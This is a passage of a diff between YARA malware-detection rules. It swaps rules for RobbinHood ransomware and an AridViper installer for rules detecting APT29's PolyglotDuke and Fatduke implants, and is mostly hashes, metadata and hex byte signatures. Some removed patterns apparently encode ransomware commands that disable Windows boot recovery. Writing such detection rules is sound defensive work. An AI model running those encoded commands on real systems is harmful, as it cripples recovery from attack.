6c 5c 5c b8 e4 c2 c2 9f 5d d3 d3 bd 6e ac ac 43 ef 62 62 } - $s7 = { 26 4c 6a 26 36 6c 5a 36 3f 7e 41 3f f7 f5 02 f7 cc 83 4f cc 34 68 5c 34 a5 51 f4 a5 e5 d1 34 e5 f1 f9 08 f1 71 e2 93 71 d8 ab 73 d8 31 62 53 31 15 2a 3f 15 04 08 0c 04 c7 95 52 c7 23 46 65 23 } - $s8 = { 7e fc 82 7e 3d 7a 47 3d 64 c8 ac 64 5d ba e7 5d 19 32 2b 19 73 e6 95 73 60 c0 a0 60 81 19 98 81 4f 9e d1 4f dc a3 7f dc 22 44 66 22 2a 54 7e 2a 90 3b ab 90 88 0b 83 88 46 8c ca 46 ee c7 29 } - $s9 = "sssssbsss" fullword ascii + $s1 = { 7b [4-6] 5b [4-6] 5d 28 [4-6] 5b [4-6] 5d 29 28 [4-6] 5b [4-6] 5d 29 3b 7d } + $s2 = { 7b 72 65 74 75 72 6e 20 [4-6] 20 25 20 28 [4-6] 2b [4-6] 29 3b 7d } + $s3 = { 7b [4-6] 20 3d 20 [4-6] 28 [4-6] 29 2e 73 70 6c 69 74 28 [4-6] 29 3b 7d } + $s4 = { 7b 72 65 74 75 72 6e 20 [4-6] 2e 63 68 61 72 41 74 28 [4-6] 29 3b 7d} + $s5 = { 7b [4-6] 5b [4-6] 5d 20 3d 20 [4-6] 5b [4-6] 5b [4-6] 5d 5d 3b 7d } condition: - uint16(0)==0x5a4d and filesize >30KB and all of them + filesize >1KB and 2 of them } -rule ARKBIRD_SOLG_Ran_Robbinhood_Oct_2020_1 : FILE +rule ARKBIRD_SOLG_APT_APT29_Polyglotduke_Mar_2021_1 : FILE { meta: - description = "Detect RobbinHood ransomware" + description = "Detect PolyglotDuke implant used by APT29 group" author = "Arkbird_SOLG" - id = "adaacb06-0738-5d2b-b97e-b9007341f743" - date = "2020-11-04" - modified = "2020-11-05" - reference = "https://twitter.com/joakimkennedy/status/1323957238680178689" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-05/RobbinHood/Ran_RobbinHood_Oct_2020_1.yar#L1-L20" + id = "751e4f57-2c31-5cad-a794-e124b40c537b" + date = "2021-03-08" + modified = "2021-03-10" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_PolyglotDuke_Mar_2021_1.yar#L1-L19" license_url = "N/A" - logic_hash = "72d0e9b1e2f6aee8f24125e6e6801329e2fad016f05a94ad65c04874a016d09d" + logic_hash = "3a6d54fb266fe054886569c200f122b1e4459e0d561fe5246b623a19ec526224" score = 75 - quality = 67 + quality = 75 tags = "FILE" - hash1 = "7c7ef3ab31ab91a7379bc2e3f32473dfa7adf662d0c640ef994103f6022a092b" - hash2 = "f927dd9044d7fa874dc6b98a0f5c9c647f3a9e5393bfe034b425cbf8db93e501" - hash2 = "3f56501f764d49723188bb119845fec4f2419a5080b74513fd0734e2a628e754" + hash1 = "9b33ec7f5e615a6556f147b611425d3ca4a8879ce746d4a8cb62adf4c7f76029" + hash2 = "0c39fce5bd32b4f91a1df4f6321c2f01c017195659c7e95a235ef71ca2865aa9" strings: - $seq = { 20 21 3d 20 20 3c 3d 3d 20 61 73 20 20 61 74 20 20 66 70 3d 20 69 73 20 20 6c 72 3a 20 6f 66 20 20 6f 6e 20 20 70 63 3d 20 73 70 3a 20 73 70 3d 25 76 0d 0a 29 20 3d 20 29 20 6d 3d 2b 49 6e 66 2c 20 6e 20 2d 49 6e 66 2e 62 61 74 2e 63 6d 64 2e 63 6f 6d 2e 65 78 65 2f 50 49 44 31 30 36 30 33 31 32 35 3a 20 70 3d 41 43 44 54 41 43 53 54 41 45 44 54 41 45 53 54 41 4b 44 54 41 4b 53 54 41 57 53 54 41 68 6f 6d 41 74 6f 69 43 45 53 54 43 68 61 6d 44 61 73 68 45 45 53 54 47 4f 47 43 4a 75 6c 79 4a 75 6e 65 4c 69 73 75 4d 32 52 74 4d 32 52 7a 4d 32 5a 79 4d 32 63 79 4d 32 64 77 4d 33 42 79 4d 69 61 6f 4d 6f 64 69 4e 33 6f 3d 4e 5a 44 54 4e 5a 53 54 4e 65 77 61 4e 6a 41 79 51 56 4a 44 51 56 5a 51 53 41 53 54 53 74 61 74 54 55 31 54 54 68 61 69 54 6b 56 47 55 46 42 55 57 45 53 54 57 45 78 54 59 32 31 30 59 32 31 6b 59 32 35 6d 59 32 46 69 59 32 46 7a 59 32 4d 3d 59 32 52 34 59 32 52 6d 59 32 52 79 59 32 55 78 59 32 55 79 59 32 56 79 59 32 5a 6e 59 32 5a 77 59 32 5a 79 59 32 64 74 59 32 68 74 59 32 6c 69 59 32 78 7a 59 33 42 70 59 33 42 77 59 33 49 79 59 33 4a 30 59 33 4a 33 59 33 4d 3d 59 33 4e 32 59 33 4e 6f 59 33 4e 73 59 33 4e 79 59 33 4e 7a 59 33 52 6d 59 57 39 70 59 57 46 6a 59 57 49 30 59 57 4a 72 59 57 4e 30 59 57 4e 6f 59 57 4e 77 59 57 4e 79 59 57 52 69 59 57 52 70 59 57 52 77 59 57 52 7a 59 57 56 7a 59 57 6b 3d 59 57 6c 30 59 57 6c 6d 59 57 70 73 59 57 77 3d 59 58 42 71 59 58 42 72 59 58 4a 33 59 58 4e 30 59 58 4e 34 59 58 4e 6a 59 58 4e 6d 59 58 4e 74 59 58 4e 77 59 58 5a 70 59 58 64 6e 59 6d 31 77 59 6d 46 30 59 6d 46 35 59 6d 46 6a 59 6d 46 72 59 6d 46 79 59 6d 4d 32 59 6d 4d 33 59 6d 4e 76 59 6d 52 69 59 6d 5a 6d 59 6d 64 30 59 6d 6c 6e 59 6d 6c 72 59 6d 6c 75 59 6d 74 36 59 6d 74 6d 59 6d 74 77 59 6e 42 33 59 6e 4a 6b 59 6e 4e 68 59 6e 56 77 59 6e 6f 79 59 77 3d 3d 5a 32 38 3d 5a 32 46 74 5a 32 52 69 5a 32 68 76 5a 32 6c 6d 5a 33 42 6e 5a 33 4a 35 5a 33 6f 3d 5a 47 31 77 5a 47 35 6e 5a 47 39 30 5a 47 39 6a 5a 47 46 30 5a 47 46 6a 5a 47 46 7a 5a 47 49 3d 5a 47 49 77 5a 47 49 7a 5a 47 4a 34 5a 47 4a 68 5a 47 4a 6d 5a 47 4d 79 5a 47 4e 6f 5a 47 4e 79 5a 47 4e 7a 5a 47 52 6b 5a 47 52 7a 5a 47 56 74 5a 47 56 79 5a 47 56 7a 5a 47 5a 7a 5a 47 64 6a 5a 47 6c 30 5a 47 6c 6d 5a 47 6c 74 5a 47 6c 77 5a 47 6c 79 5a 47 70 32 5a 48 4a 33 5a 48 4a 6d 5a 48 4e 30 5a 48 4e 69 5a 48 4e 72 5a 48 52 6b 5a 48 64 6d 5a 48 64 6e 5a 48 64 7a 5a 48 68 30 5a 48 68 34 5a 48 68 69 5a 48 68 6d 5a 48 68 6e 5a 57 31 73 5a 57 52 69 5a 58 42 72 5a 58 42 7a 5a 58 4a 6d 5a 58 4e 74 5a 58 68 6d 5a 6d 31 69 5a 6d 39 7a 5a 6d 4a 33 5a 6d 52 69 5a 6d 59 3d 5a 6d 5a 6b 5a 6d 5a 6d 5a 6d 67 3d 5a 6d 68 6b 5a 6d 78 32 5a 6d 78 68 5a 6d 78 6d 5a 6e 42 34 5a 6e 42 72 5a 6e 4a 74 5a 6e 4e 6f 5a 6e 56 73 5a 6e 68 6e 0a 09 6d 3d 5d } - $com1 = "os/exec.(*Cmd).Run" fullword ascii - $com2 = "os/exec.(*Cmd).Start" fullword ascii - $com3 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 31 2e 76 62 73 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 32 2e 76 62 73 43 } - $str1 = { 63 6d 64 7a 63 7a 4e 68 63 73 } - $str2 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 69 62 32 39 30 63 33 52 68 64 48 56 7a 63 47 39 73 61 57 4e 35 49 47 6c 6e 62 6d 39 79 5a 57 46 73 62 47 5a 68 61 57 78 31 63 6d 56 7a } - $str3 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 79 5a 57 4e 76 64 6d 56 79 65 57 56 75 59 57 4a 73 5a 57 51 67 62 6d 38 3d } + $seq1 = { 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 4c 8b 15 [2] 02 00 41 8b c0 4c 33 15 [2] 02 00 74 03 49 ff e2 83 e0 01 4c 8b ca 41 83 e0 02 8b d0 48 ff 25 [2] 01 00 cc cc cc 4c 8b 15 [2] 02 00 4c 33 15 [2] 02 00 74 03 49 ff e2 48 ff 25 [2] 01 00 cc cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 07 48 83 c4 28 48 ff e0 b9 78 00 00 00 ff 15 [2] 01 00 32 c0 48 83 c4 28 c3 cc cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 33 c0 c3 cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 } + $seq2 = { 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 30 33 ff 48 8b da 48 8b f1 48 85 c9 75 18 e8 69 0c 00 00 bb 16 00 00 00 89 18 e8 b1 38 00 00 8b c3 e9 a7 00 00 00 48 85 d2 74 e3 e8 a8 3f 00 00 41 bf 01 00 00 00 85 c0 75 0c ff 15 [2] 01 00 85 c0 41 0f 44 ff 83 64 24 28 00 48 83 23 00 48 83 64 24 20 00 41 83 c9 ff 4c 8b c6 33 d2 8b cf ff 15 [2] 01 00 48 63 e8 85 c0 75 11 ff 15 [2] 01 00 8b c8 e8 b2 0b 00 00 33 c0 eb 4f 48 8b cd 48 03 c9 e8 e3 07 00 00 48 89 03 48 85 c0 74 e9 41 83 c9 ff 4c 8b c6 33 d2 8b cf 89 6c 24 28 48 89 44 24 20 ff 15 [2] 01 00 85 c0 75 1b ff 15 [2] 01 00 8b c8 e8 70 0b 00 00 48 8b 0b e8 ?? f3 ff ff 48 83 23 00 eb b0 41 8b c7 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5f c3 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 40 33 ff 48 8b da 48 8b f1 } + $seq3 = { ff 25 00 00 00 00 00 00 00 00 00 00 00 00 cc } + $seq4 = "InitSvc" fullword ascii condition: - uint16(0)==0x5a4d and filesize >600KB and $seq and 2 of ($com*) and 2 of ($str*) + uint16(0)==0x5a4d and filesize >100KB and 3 of them } -rule ARKBIRD_SOLG_APT_Aridviper_Installer_Feb_2020_1 : FILE +rule ARKBIRD_SOLG_APT_APT29_Fatduke_Mar_2021_1 : FILE { meta: - description = "Detect Installer used by AridViper group in Febuary 2021" + description = "Detect Fatduke implant used by APT29 group" author = "Arkbird_SOLG" - id = "3d891aeb-b4d6-50f2-ad08-cb6d9d56064d" - date = "2021-02-08" - modified = "2021-02-09" + id = "aed6d6f0-1baf-5842-8ced-e07f213ef1ff" + date = "2021-03-08" + modified = "2021-03-10" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-08/AridViper/APT_AridViper_Installer_Feb_2020_1.yar#L1-L26" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_Fatduke_Mar_2021_1.yar#L1-L25" license_url = "N/A" - logic_hash = "1fca713b7ac7f3e960a4174325c32578724e87241e159fbf7754c7e2d19779a1" + logic_hash = "2aec00355b14ec81f577527d3eba1f682ce96cc9e6ac7727b3865ddf01ddf69a" score = 50 - quality = 69 + quality = 67 tags = "FILE" + hash1 = "0be57d1244fefc679feb7aa9996e539481be7b8f4c9246817f81caa8c2f61a57" level = "Experimental" - hash1 = "16ed131c4a7545495dc3f07d199748a5d0560e7c8a44493c1906163bedc9c2e0" - hash2 = "84d9c7852b87253ccf0ca1aad57e510a4badfe253c063a72c7751930f0279c83" strings: - $seq_db = { 8b 7d ec 33 d2 89 55 ec 8b 0f 8b c1 89 4d e4 38 11 74 2e 66 90 83 f8 ff 73 24 8a 08 40 80 f9 c0 72 16 8a 08 80 e1 c0 80 f9 80 75 0c 8a 48 01 40 80 e1 c0 80 f9 80 74 f4 42 80 38 00 75 d7 89 55 ec f7 46 18 00 00 08 00 74 47 8b d7 8b cb e8 a2 f9 ff ff 89 45 e0 85 c0 74 34 83 7d f0 01 b9 [3] 00 50 ff 75 f8 b8 [3] 00 ff 75 e4 0f 44 c8 51 ff 75 f4 68 [3] 00 53 e8 34 2e 00 00 8b 55 e0 83 c4 1c 8b ce e8 ?? c3 fc ff 8b 55 ec ff 75 e4 8b 45 f8 b9 [3] 00 83 7d f0 01 52 50 50 50 50 50 b8 [3] 00 0f 44 c1 50 ff 75 f4 68 [3] 00 53 e8 f8 2d 00 00 83 c4 2c ba [3] 00 8b ce ff 75 f4 e8 e6 2e 00 00 83 c4 04 85 c0 74 16 ff 37 ff 75 f8 ff 75 f4 68 [3] 00 53 e8 cc 2d 00 00 83 c4 14 8b d7 8b cb e8 90 f9 ff ff 89 45 e0 85 c0 74 1e 50 8b 45 f8 50 50 68 [3] 00 53 e8 a8 2d 00 00 8b 55 e0 83 c4 14 8b ce e8 ?? c3 fc ff f7 46 18 00 00 08 00 74 2e 8b cf e8 db e5 00 00 8b f0 85 f6 74 1e 0f 1f 44 00 00 8b 16 3b d7 74 0c ff 32 8b cb e8 f1 f9 ff ff 83 c4 04 8b 76 0c 85 f6 75 e7 8b 75 e8 ff 75 f8 8b d7 8b cb e8 d8 f9 ff ff 83 c4 04 } - $seq_createdb = { 8a 43 42 84 c0 78 05 0f be c0 eb 07 8b cf e8 ?? 91 fb ff 8b 4d f8 8b d0 e8 ?? 90 fb ff 68 [3] 00 8b d6 8b cb e8 4d fc ff ff 8b f8 83 c4 04 85 ff 0f 85 41 01 00 00 68 [3] 00 8b d6 8b cb e8 32 fc ff ff 8b f8 83 c4 04 85 ff 0f 85 26 01 00 00 68 [3] 00 8b d6 8b cb e8 17 fc ff ff 8b f8 83 c4 04 85 ff 0f 85 0b 01 00 00 68 [3] 00 8b d6 8b cb e8 fc fb ff ff 8b f8 83 c4 04 85 ff 0f 85 f0 00 00 00 68 [3] 00 8b d6 8b cb e8 e1 fb ff ff 8b f8 83 c4 04 85 ff 0f 85 d5 00 00 00 68 [3] 00 8b d6 8b cb e8 c6 fb ff ff 8b f8 83 c4 04 85 ff 0f 85 ba 00 00 00 68 [3] 00 8b d6 8b cb e8 eb fa ff ff 8b f8 83 c4 04 85 ff 0f 85 9f 00 00 00 33 f6 0f 1f 40 00 0f 1f 84 00 00 00 00 00 } - $OP_Files1 = { 51 68 [3] 00 b9 [3] 00 e8 [2] 00 00 80 3d [3] 00 00 75 04 33 c9 eb 11 b9 [3] 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 51 68 [3] 00 b9 [3] 00 e8 [2] 00 00 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 } - $OP_Files2 = { 00 00 83 c4 04 83 78 18 10 72 05 8b 40 04 eb 03 83 c0 04 [3-9] 00 50 68 [3] 00 6a 00 6a 00 ff [1-5] 8b 95 c8 fe ff ff 83 fa 10 72 0c 8b 8d b4 fe ff ff } - $s1 = "D$t9D$ }J" fullword ascii - $s2 = "u#h`KN" fullword ascii - $s3 = { 6f 73 5f 77 69 6e 2e 63 3a 25 64 3a 20 28 25 6c 75 29 20 25 73 28 25 73 29 20 2d 20 25 73 } - $s4 = { 61 63 63 65 73 73 20 74 6f 20 25 73 2e 25 73 2e 25 73 20 69 73 20 70 72 6f 68 69 62 69 74 65 64 } - $s5 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 } - $s6 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a } + $seq1 = { 5b 8d 8d 5c ff ff ff c7 85 5c ff ff ff 48 74 74 70 51 8d 85 6c ff ff ff c7 85 60 ff ff ff 4f 70 65 6e 50 51 8d 8d 14 fc ff ff c7 85 64 ff ff ff 52 65 71 75 c7 85 68 ff ff ff 65 73 74 57 e8 ce 7b f2 ff c6 45 fc 33 83 78 14 10 72 02 8b 00 50 8d 8d 90 fc ff ff e8 16 7b f2 ff c6 45 fc 34 8d 85 90 fc ff ff 50 8d 85 80 fb ff ff 8b cb 50 e8 bd 74 00 00 8b f0 c6 45 fc 35 8d 87 d0 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 d0 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 c3 2e f6 ff c6 45 fc 34 8d 8d 80 fb ff ff e8 a4 7e f2 ff c6 45 fc 33 83 bd a4 fc ff ff 10 72 0e ff b5 90 fc ff ff e8 71 0d 17 00 83 c4 04 c7 85 a4 fc ff ff 0f 00 00 00 c7 85 a0 fc ff ff 00 00 00 00 c6 85 90 fc ff ff 00 c6 45 fc 1b 83 bd 28 fc ff ff 10 72 0e ff b5 14 fc ff ff e8 3b 0d 17 00 83 c4 04 c7 85 28 fc ff ff 0f 00 00 00 c7 85 24 fc ff ff 00 00 00 00 c6 85 14 fc ff ff 00 57 bf 0b 3b 0e 02 31 cf 21 d7 21 ff bf 2b 34 81 13 21 c7 09 cf 5f 56 be 22 0c d2 00 be 80 41 78 6d 31 e6 21 ee be 55 13 41 71 90 5e 8d 8d 1c ff ff ff c7 85 1c ff ff ff 48 74 74 70 51 8d 85 32 ff ff ff c7 85 20 ff ff ff 41 64 64 52 50 51 8d 8d 2c fc ff ff c7 85 24 ff ff ff 65 71 75 65 c7 85 28 ff ff ff 73 74 48 65 c7 85 2c ff ff ff 61 64 65 72 66 c7 85 30 ff ff ff 73 57 e8 67 7a f2 ff c6 45 fc 36 83 78 14 10 72 02 8b 00 50 8d 8d 38 fd ff ff e8 af 79 f2 ff c6 45 fc 37 8d 85 38 fd ff ff 50 8d 85 c8 fb ff ff 8b cb 50 e8 36 b1 ff ff 8b f0 c6 45 fc 38 8d 87 e8 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 e8 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 5c 2d f6 ff c6 45 fc 37 8d 8d c8 fb ff ff e8 3d 7d f2 ff c6 45 fc 36 83 bd 4c fd ff ff 10 72 0e ff b5 38 fd ff ff e8 0a 0c 17 00 83 c4 04 c7 85 4c fd ff ff 0f 00 00 00 c7 85 48 fd ff ff 00 00 00 00 c6 85 38 fd ff ff 00 c6 45 fc 1b 83 bd 40 fc ff ff 10 72 0e ff b5 2c fc ff ff e8 d4 0b 17 00 83 c4 04 c7 85 40 fc ff ff 0f 00 00 00 c7 85 3c fc ff ff 00 00 00 00 c6 85 2c fc ff ff 00 50 b8 dc 4d a8 4d b8 4f 50 97 15 b8 97 55 f0 68 01 c0 01 e8 90 58 50 b8 e6 6f 71 3c 21 e0 21 e8 21 f0 21 c0 31 f0 b8 fa 02 db 55 58 8d 8d 7c ff ff ff c7 85 7c ff ff ff 48 74 74 70 51 8d 45 8c c7 45 80 53 65 6e 64 50 51 8d 8d 60 fc ff ff c7 45 84 52 65 71 75 c7 45 88 65 73 74 57 e8 1f 79 f2 ff c6 45 fc 39 83 78 14 10 72 02 8b 00 50 8d 8d 08 fd ff ff e8 67 78 f2 ff c6 45 fc 3a 8d 85 08 fd ff ff 50 8d 85 f8 fb ff ff 8b cb 50 e8 4e 75 00 00 8b f0 c6 45 fc 3b 8d 87 00 01 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 00 01 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 14 2c f6 ff c6 45 fc 3a 8d 8d f8 fb ff ff e8 f5 7b f2 ff c6 45 fc 39 83 bd 1c fd ff ff 10 72 0e ff b5 08 fd ff ff e8 c2 0a 17 00 83 c4 04 c7 85 1c fd ff ff 0f 00 00 00 c7 85 18 fd ff ff 00 00 00 00 c6 85 08 fd ff ff 00 c6 45 fc 1b 83 bd 74 fc ff ff 10 72 0e ff b5 60 fc ff ff e8 8c 0a 17 00 83 c4 04 c7 85 74 fc ff ff 0f 00 00 00 c7 85 70 fc ff ff 00 00 00 00 c6 85 60 fc ff ff 00 50 01 c8 21 f8 b8 f5 2f 8f 4d 01 e8 09 d0 01 c0 b8 4e 35 2f 2a 58 52 ba 6d 65 6b 13 01 fa 09 da 31 c2 09 da ba c9 1d 51 12 31 c2 5a 8d 4d 9c c7 45 9c 48 74 74 70 51 8d 45 aa c7 45 a0 51 75 65 72 50 51 8d 8d 48 fc ff ff c7 45 a4 79 49 6e 66 66 c7 45 a8 6f 57 e8 de 77 f2 ff c6 45 fc 3c 83 78 14 10 72 02 8b 00 50 8d 8d 50 fd ff ff e8 26 77 f2 ff c6 45 fc 3d 8d 85 50 fd ff ff 50 8d 85 98 fb ff ff 8b cb 50 e8 4d 77 00 00 8b f0 c6 45 fc 3e 8d 9f 18 01 00 00 3b de 74 24 8b 4b 10 85 c9 74 15 8b 11 3b cb 0f 95 c0 0f b6 c0 50 ff 52 10 c7 43 10 00 00 00 00 56 8b cb e8 d9 2a f6 ff c6 45 fc 3d 8d 8d 98 fb ff ff e8 ba 7a f2 ff c6 45 fc 3c 83 bd 64 fd ff ff 10 72 0e ff b5 50 fd ff ff e8 87 09 17 00 83 c4 04 c7 85 64 fd ff ff 0f 00 00 00 c7 85 60 fd ff ff 00 00 00 00 c6 85 50 fd ff ff 00 c6 45 fc 1b 83 bd 5c fc ff ff 10 72 0e ff b5 48 fc ff ff e8 51 09 17 00 83 c4 04 c7 85 5c fc ff ff 0f 00 00 00 c7 85 58 fc ff ff 00 00 00 00 c6 85 48 fc ff ff 00 56 01 d6 19 ee be ed 3e 23 0c 01 fe 21 e6 be db 1f 20 70 31 e6 5e 57 29 c7 bf 8d 30 ff 05 bf 4e 30 f9 71 19 f7 29 f7 31 ff 09 ef 5f 68 b8 b3 2b 10 8d 8d d8 fc ff ff e8 22 76 f2 ff c6 45 fc 3f 8d 8d d8 fc ff ff e8 f3 e5 f3 ff 8b f0 c6 45 fc 1b 83 bd ec fc ff ff 10 72 0e ff b5 d8 fc ff ff e8 ce 08 17 00 83 c4 04 c7 85 ec fc ff ff 0f 00 00 00 c7 85 e8 fc ff ff 00 00 00 00 c6 85 d8 fc ff ff 00 52 ba 13 63 67 6d ba 64 19 d5 47 ba 08 52 da 36 01 ea 29 f2 90 5a 55 bd 53 0d b6 39 bd 54 64 02 7d bd 29 00 37 0f 09 d5 31 c5 90 5d 8d 45 c0 8b ce 50 e8 f4 f0 f4 ff c6 45 fc 40 52 29 c2 ba a5 19 33 0c 19 ea 31 e2 01 c2 ba 3c 66 39 43 29 ca 5a 52 ba f7 42 4e 7a 09 d2 19 c2 19 e2 01 e2 21 ca 01 ca 01 da 90 5a 8d 45 d8 8b ce 50 e8 c9 fa f4 ff c6 45 fc 41 57 01 df 09 d7 bf 16 71 1b 6c bf 80 30 fd 65 01 ff 19 f7 21 ef 5f 50 29 e8 b8 6d 44 90 22 01 e8 21 c8 b8 17 5e 05 78 09 f0 01 e8 58 83 7d d0 00 76 5b 83 7d d4 08 8b 45 c0 73 03 8d 45 c0 83 7d ec 08 8b 4d d8 73 03 8d 4d d8 83 ec 08 50 6a 03 51 8d 4f 40 e8 3c 87 ff ff 89 87 a0 04 00 00 52 31 e2 01 e2 ba b7 14 98 25 01 ca ba 2f 1e d7 1b 19 f2 29 d2 5a 57 bf 75 4c a1 10 bf dc 04 47 09 01 d7 bf 9e 5f 9a 0e 01 e7 90 5f eb 4e 83 7d ec 08 8b 45 d8 73 03 8d 45 d8 83 ec 08 8d 4f 40 6a 00 6a 01 50 e8 ec 86 ff ff 89 87 a0 04 00 00 53 bb ea 4a 79 17 21 eb 31 db bb b9 2c e1 4c 09 d3 21 eb 19 c3 5b 51 b9 91 6c 71 6d b9 64 25 d3 02 19 c1 19 c1 31 e1 29 f1 29 d9 59 83 bf a0 04 00 00 00 0f 85 a6 00 00 00 8d 8d e4 fe ff ff c7 85 e4 fe ff ff 43 61 6e 6e 51 8d 85 00 ff ff ff c7 85 e8 fe ff ff 6f 74 20 70 50 51 8d 8d 68 fb ff ff c7 85 ec fe ff ff 65 72 66 6f c7 85 f0 fe ff ff 72 6d 20 49 c7 85 f4 fe ff ff 6e 74 65 72 c7 85 f8 fe ff ff 6e 65 74 4f c7 85 fc fe ff ff 70 65 6e 21 e8 bd 74 f2 ff c6 45 fc 42 83 78 14 10 } + $seq2 = { 59 52 29 d2 ba 02 4d d2 52 ba 5f 54 50 4f 29 ea 29 c2 01 ea 01 e2 5a 56 21 ee 01 ee be 38 36 21 60 31 f6 19 ce 29 d6 be 13 6c 2d 6f 5e 85 c0 0f 85 0a 02 00 00 8d 8d 1c fe ff ff c7 85 1c fe ff ff 43 61 6e 6e 51 8d 85 5e fe ff ff c7 85 20 fe ff ff 6f 74 20 69 50 51 8d 8d c4 f7 ff ff c7 85 24 fe ff ff 6e 69 74 69 c7 85 28 fe ff ff 61 6c 69 7a c7 85 2c fe ff ff 65 20 73 69 c7 85 30 fe ff ff 67 6e 65 72 c7 85 34 fe ff ff 21 20 43 61 c7 85 38 fe ff ff 6e 6e 6f 74 c7 85 3c fe ff ff 20 70 65 72 c7 85 40 fe ff ff 66 6f 72 6d c7 85 44 fe ff ff 20 43 72 79 c7 85 48 fe ff ff 70 74 41 63 c7 85 4c fe ff ff 71 75 69 72 c7 85 50 fe ff ff 65 43 6f 6e c7 85 54 fe ff ff 74 65 78 74 c7 85 58 fe ff ff 20 65 72 72 66 c7 85 5c fe ff ff 6f 72 e8 93 5b f1 ff c6 45 fc 46 83 78 14 10 72 02 8b 00 50 8d 8d f0 f9 ff ff e8 db 5a f1 ff c6 45 fc 47 ff d3 50 8d 85 f0 f9 ff ff 50 8d 8d 78 f8 ff ff e8 c2 e3 f8 ff 68 d4 4f 2e 10 8d 85 78 f8 ff ff 50 e8 3c 31 16 00 8d 8d 64 fe ff ff c7 85 64 fe ff ff 43 61 6e 6e 51 8d 85 a6 fe ff ff c7 85 68 fe ff ff 6f 74 20 69 50 51 8d 8d 94 f7 ff ff c7 85 6c fe ff ff 6e 69 74 69 c7 85 70 fe ff ff 61 6c 69 7a c7 85 74 fe ff ff 65 20 73 69 c7 85 78 fe ff ff 67 6e 65 72 c7 85 7c fe ff ff 21 20 43 61 c7 85 80 fe ff ff 6e 6e 6f 74 c7 85 84 fe ff ff 20 70 65 72 c7 85 88 fe ff ff 66 6f 72 6d c7 85 8c fe ff ff 20 43 72 79 c7 85 90 fe ff ff 70 74 41 63 c7 85 94 fe ff ff 71 75 69 72 c7 85 98 fe ff ff 65 43 6f 6e c7 85 9c fe ff ff 74 65 78 74 c7 85 a0 fe ff ff 20 65 72 72 66 c7 85 a4 fe ff ff 6f 72 e8 8e 5a f1 ff c6 45 fc 48 83 78 14 10 72 02 8b 00 } + $seq3 = { c7 85 1c f8 ff ff 07 00 00 00 c7 85 18 f8 ff ff 00 00 00 00 33 c0 66 89 85 08 f8 ff ff 53 19 f3 21 db 21 fb 31 f3 29 fb 19 f3 bb 9f 7a e7 00 21 fb 90 5b 52 ba 77 2c 66 51 ba 60 54 5a 36 19 ea 09 ca ba 32 36 94 1b 90 5a 53 09 eb bb 92 73 c4 2a bb d1 71 ed 5e 01 eb bb 9b 43 21 23 90 5b 50 b8 09 65 36 3a 09 c0 29 e8 29 f8 21 f8 b8 3d 39 c6 44 01 e8 58 89 85 78 fd ff ff 89 85 7c fd ff ff 89 85 80 fd ff ff 89 85 84 fd ff ff 89 85 88 fd ff ff 89 85 8c fd ff ff c7 85 88 f8 ff ff 52 65 67 4f c7 85 8c f8 ff ff 70 65 6e 4b c7 85 90 f8 ff ff 65 79 45 78 c6 85 94 f8 ff ff 57 89 85 48 f8 ff ff 89 85 4c f8 ff ff c7 85 4c f8 ff ff 0f 00 00 00 89 85 48 f8 ff ff 88 85 38 f8 ff ff 8d 85 95 f8 ff ff 50 8d 85 88 f8 ff ff 50 8d 85 38 f8 ff ff 50 50 8b c8 e8 99 c1 de ff c6 45 fc 0a 83 bd 4c f8 ff ff 10 8b 85 38 f8 ff ff 73 06 8d 85 38 f8 ff ff 50 8d } + $seq4 = { 31 e1 b9 e9 52 83 05 29 d1 01 f9 59 80 7d 0c 00 0f 84 fb 03 00 00 66 c7 85 70 fe ff ff 0d 0a c7 85 50 fe ff ff 0d 0a 2d 2d c7 85 14 fe ff ff 53 75 62 6d c7 85 18 fe ff ff 69 74 74 65 c6 85 1c fe ff ff 64 c7 85 